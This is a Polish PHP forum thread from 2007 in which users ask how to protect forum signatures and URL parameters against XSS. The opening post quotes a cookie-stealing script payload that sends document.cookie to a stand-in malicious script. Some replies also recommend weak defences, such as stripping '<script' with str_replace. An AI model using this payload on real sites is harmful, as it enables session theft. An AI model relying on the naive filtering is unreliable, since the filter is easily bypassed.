Jak zabezpieczyć np. podpis na forum, przed atakami XSS Opcje

[TomASS]

Tak sobie myślę, że w większości for jest podpis użytkownika. Niektóre fora nie filtrują podpisów (np. mogę dać w podpisie obrazek itp.) a jakby tak dać:

[HTML] pobierz, plaintext 
<script type="text/javascript">
var adr = 'zly_skrypt.php?ciasteczka=' + escape(document.cookie);
var obr = '<IMG src="' + adr + '">';
document.write(obr);
</SCRIPT>
[HTML] pobierz, plaintext 

To się chyba nazywa atak XSS.

Jak się przed tym zabezpieczyć, aby np. akceptował obrazki, odnośniki itp. a nie akceptował "złych skryptów"?

[Ociu]

Daj tylko dozwolone znaki - bbCode.

[marcini82]

Ja na poczatek wywalam (przy pomocy str_replace()) z danych od uzytkownika ciag '<script'

[gladiror]

Wrócę może do tego tematu bo mam konkretne pytanie do tego posta - chodzi mi o to czy wystarczy walidować każdą otrzymaną zmienną funkcją htmlspecialchars, żeby nie można było wykonać kod np. java script albo wstawić kod php?(IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif) Chodzi mi dokladnie o cos takiego. mamy strone:

index.php?roz=<a href="http://sotrna/zlosliwy_kod.php"></a>

[PHP] pobierz, plaintext 
<?php
Rozdzielczosc ekranu to:
$roz = $_GET['height'];
print($roz);
?>
[PHP] pobierz, plaintext 

Czy jak użyje htmlspecialchars($roz) to uchroni mnie to na 100% przed atakiem wpisania w zmienna złośliwego kodu??

Ten post edytował gladiror 10.07.2007, 19:38:42

[LonelyKnight]

Ja na poczatek wywalam (przy pomocy str_replace()) z danych od uzytkownika ciag '<script'

A co jeśli zamiast '<script' będzie '< script'? (IMG:http://forum.php.pl/style_emoticons/default/Rkingsmiley.png) ...bo coś mi się wydaje, że przeglądarka to łyknie a str_replace() nie bardzo (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)

Czy jak użyje htmlspecialchars($roz) to uchroni mnie to na 100% przed atakiem wpisania w zmienna złośliwego kodu??

htmlspecialchars() wyświetla znaki specjalne a nie ich interpretację. Po co wyświetlać np.

[HTML] pobierz, plaintext 
<a href="jestemzly.php">zuuuło</a>
[HTML] pobierz, plaintext 

Jak takie coś Ci odpowiada to okej ale lepiej użyć strip_tags(), które usunie znaczniki php i html.

Rozwiązanie zaproponowane przez Ociu wydaję się najlepsze jednak proponowałbym jeszcze zwrócić uwagę na obecność "%" w przesyłanych danych. Czasami może zdarzyć się, że zapisując niektóre znaki w ASCII czy UNICODE uda się ominąć niektóre zabezpieczenia (IMG:http://forum.php.pl/style_emoticons/default/guitar.gif)

[maxserwer]

A mi się wydaje że tego przeglądarka może nie łyknąć (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ale to jest tylko moja sugestia, spróbuj i napisz jak Ci poszło, liczę że pomimo moich myśli będzie wszystko (IMG:http://forum.php.pl/style_emoticons/default/guitar.gif)

[gladiror]

użyłem htmlspecialchars i wyswietla mi wartość zmiennej -> zamiast > pokazuje &gt;

Kwestia jest teraz taka czy da sie to jakoś obejść czy już nie ma możliwości??

Ten post edytował gladiror 10.07.2007, 23:41:16

[flv]

Przecież na tym polega działanie tej funkcji, zamiana 'niebezpiecznych' znaków na encje..

[marcini82]

A co jeśli zamiast '<script' będzie '< script'?

Przegladarka tego nie lyknie, sprawdz (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

htmlspecialchars() tez jest w tym przypadku ok, bo wtedy '<script' po prostu sie wyswietli jak kazdy inny ciag.

Ten post edytował marcini82 11.07.2007, 06:48:32

[LonelyKnight]

Przegladarka tego nie lyknie, sprawdz (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Fakt, trochę mnie fantazja poniosła (IMG:http://forum.php.pl/style_emoticons/default/laugh.gif)